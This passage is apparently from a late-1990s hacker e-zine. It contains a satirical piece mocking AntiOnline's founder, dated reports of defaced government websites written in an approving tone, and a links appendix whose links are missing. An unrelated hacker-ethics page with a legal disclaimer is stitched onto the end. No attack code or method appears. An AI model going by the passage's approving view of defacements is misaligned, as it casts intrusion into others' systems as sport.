Immediately after, JP played a Leave it To Beaver midi theme, put on a small baseball hat and walked out. When reached by phone JP had this to say, "Yes, AntiOnline is a hackers security site. But so what if my dad was Beaver Cleaver. I still have to stop hackers. And please cease with the Little Beaver emails. It's annoying and pointless. One of the reasons AntiOnline is so successful is because my dad told me to get revenge on the world for canceling his show. And that Beaver Cleaver dis-placed anger still lingers in me. So you can do anything you want to.. But remember, I have Beaver power!"

It's not sure if Wally and the rest of the whole gang are open to questions. Last seen, Wourd Cleaver was still on AOL perfecting his scrolling skills. The FBI has also opened a case against suspected Granny Hacker from heck Carolyn Meinel on the grounds of dressing/looking like a crack friend and the possibility she is Wallies long lost best friend, Eddy Haskel.

[Reporting for Innerpulse News, this is Matthew Katona signing off.]

AntiOnline

@HWA

SITE.1 AntiOffline
~~~~~~~~~~~

AntiOffline is a parody of AntiOnline which has been around for some time now; check it out if you haven't already.

@HWA

H.W Hacked websites
~~~~~~~~~~~~~~~~

Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed
- Ed * Hackers Against Racist Propaganda (See issue #7) Haven't heard from Catharsys in a while for those following their saga visit for 'the story so far'... From HNN rumours section see the archives section on HNN or for copies of many of these sites in their defaced form. June 28th contributed by Anonymous Cracked A busy weekend for some. Take a look at all the .gov sites. June 29th Contributed by Anonymous Cracked The following sites have been reported as cracked. June 30th contributed by Anonymous Cracked The following sites has been reported as compromised. July 1st Keebler Elves Strike Yet Another Government Server contributed by Code Kid Upset by the actions of John Vranesevich of AntiOnline and Harvard Universities overreaction the Keebler Elves have attacked another government web site. This time they have posted very derogatory comments about John Vranesevich on the web site of the Bureau of Reclamation, Rio Grande Operations. HNN Cracked Pages Archive July 2nd contributed by Anonymous Cracked The following sites have been reported as compromised over the last two days. - possible first crack of .int domain ------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) hack-faq Hacker's Jargon File (The quote file) Original jargon file New Hacker's Jargon File. New jargon file Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... 
- Ed Belgium.......: Go there Brasil........: Go there Go there Canada .......: Go there Columbia......: Go there Go there Indonesia.....: Go there Go there Go there Netherlands...: Go there Russia........: Go there Singapore.....: Go there Turkey........: - Turkish Scene is Turkey's first and best security related e-zine. Go there Got a link for this section? email it to and i'll review it and post it here if it merits it. @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- 1998, 1999 (c) Cruciphux/ (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]

The purpose of this site is to gain a better understanding of computer security.
A hacker, by definition, is someone who seeks to improve information systems with the sole aim of contributing to the stability of those systems!
Popular belief has it that hackers are pirates.
That is true. But there are different kinds of pirate,
just as there are different kinds of people.
The usual blunders that come to mind when the term "computer pirate" is mentioned
would be hijacking MSN accounts, computers cowardly trojaned with ready-made exploits,
and can spamming even be classed as hacking
when ready-made scripts have been doing it extremely well for more than 15 years?

Those are not hackers doing that!!!
We call these people lamers when they are bad at it,
or black hats when they are skilled at carrying out their misdeeds.
No self-respect - no dignity.
They act out of disgust, revenge or simple pleasure.
The reasons can be many, and I do not claim the right to judge anyone.
I just think that Fly's sword should not be used to commit injustices.
It is a hundred times more rewarding to improve a system than to stomp on a sandcastle... even if stomping on a sandcastle is fun :P
It is up to you to find your own fun. ;)

You can react in the shoutbox.

Disclaimer: you must read the rules below before browsing this site.
In accordance with the provisions of the various laws in force concerning fraudulent intrusion into and fraudulent presence on a site, and theft and/or falsification of data:
You must under no circumstances put into practice the schemes presented on this site, which are shown solely for educational and research purposes in the field of data protection.
You must under no circumstances use what you have discovered unless you have written authorisation from the administrator of a site, or that administrator has opened an account for you solely for the purpose of finding vulnerabilities.
All of this is forbidden and illegal; do not do anything reckless.
You therefore accept that the administrator of this site is in no way responsible for any of your actions. Otherwise, leave this site.
You are bound by this disclaimer.